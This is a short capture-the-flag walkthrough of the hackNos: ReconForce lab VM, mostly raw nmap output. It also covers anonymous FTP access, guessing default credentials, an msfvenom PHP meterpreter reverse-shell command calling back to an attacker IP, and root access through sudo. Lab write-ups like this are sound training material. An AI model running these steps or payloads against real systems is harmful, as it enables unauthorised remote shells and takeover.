hackNos: ReconForce Walkthrough
hackNos: ReconForce Walkthrough
Host is up, received arp-response (0.0012s latency).
Scanned at 2020-02-17 13:51:07 India Standard Time for 26s
Not shown: 997 closed ports
Reason: 997 resets
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6f:96:94:65:72:80:08:93:23:90:20:bc:76:df:b8:ec (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDUlaO7CqI0Ngdhn5k6s6OsO6t4cSdKNECxUIjQqHx894S3C6wTCfZh6AkmnfSHPka/AtopEqGwr078jY5Vqkpg+YAmuT0rvc++tlSV7Jwn6q1gjaNUlkoUg7bMNlyBsOTBv977JB3GYcD0UgrB02vjRxbrhRgyNaxLWC5WUwHkhTCVeUQqP+2HASjnmV5nKMa5HYXNe4f9yeB6ZZ4xWaDwk6OTdRC8r/0Lmi5E2jmQWUc1i7ABZlInx/CTOqBDLCzKl/hxRO83U1o3gTx1GoahxcQrBm/wRP0hnTrns+dUC7bnlz8AVO5qV9vo953kfIV80GcgSXgBPF1ortOhGJcbr/I6awFMYXEauxHXGocOJ0FpwrkRwbz7Vr75eQA15bPpt+UmdUYzBrHOIkOafLt5F00ofU7pAyXDQBbI84HlbFEMNm2mHANgxaIasVMAf54jwckIonaDA9qZ7k2DQURX2InsA2KmRGKnC3x61NzeVuFwX25t4AqzceVuKWnjkIM=
| 256 6f:bb:49:1a:a9:b6:e5:00:84:19:a0:e4:2b:c4:57:c4 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFjhaMef9pyq2VUWLEn55nxXKJuNPyAxoh2pSygawGh8ozI/+Rbv9QOwNMuNRpaoEbl0UQRI2eekXg0f2r16JPw=
| 256 ce:3d:94:05:f4:a6:82:c4:7f:3f:ba:37:1d:f6:23:b0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBojzCf/3K/qMpLEcKJ+8tok41HScNSx3vE3GZqb/UDy
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Recon_Web
MAC Address: 08:00:27:C1:56:8B (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/17%OT=21%CT=1%CU=40326%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=5E4A4D0D%P=i686-pc-windows-windows)SEQ(SP=104%GCD=1%ISR=10E%TI=Z%CI=Z%
OS:II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11N
OS:W7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE8
OS:8%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40
OS:%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=
OS:%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%
OS:W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=
OS:)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%
OS:DFI=N%T=40%CD=S)
Uptime guess: 46.991 days (since Wed Jan 01 14:04:49 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.23 ms 192.168.56.106
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:51
Completed NSE at 13:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:51
Completed NSE at 13:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:51
Completed NSE at 13:51, 0.01s elapsed
Read data files from: C:\Program Files (x86)\Nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.97 seconds
Raw packets sent: 1111 (52.918KB) | Rcvd: 1072 (46.330KB)
Access FTP Service With anonymous access- (Found "Security@hackNos" in the ftp banner)
ftp 192.168.56.106
Connected to 192.168.56.106.
220 "Security@hackNos".
200 Always in UTF8 mode.
User (192.168.56.106:(none)): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> lsit
login with some default credentials (i.e. admin/admin, admin/password) getting Unauthorized error-
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.103 lport=4444 -f raw
Saved this file as shell1.php
python -m SimpleHTTPServer 8000
Python TTY Shell-
User.Txt File Access-
recon user details- (tried login to the user "recon" with found password "Security@hacknos", as this name is used in the website many times).
recon:x:1000:119:rahul:/home/recon:/bin/bash
Privilege Escalation-
(tried if the user recon has an entry in sudoers group, so lets Sudo su)
Thanks..
Comments
Post a Comment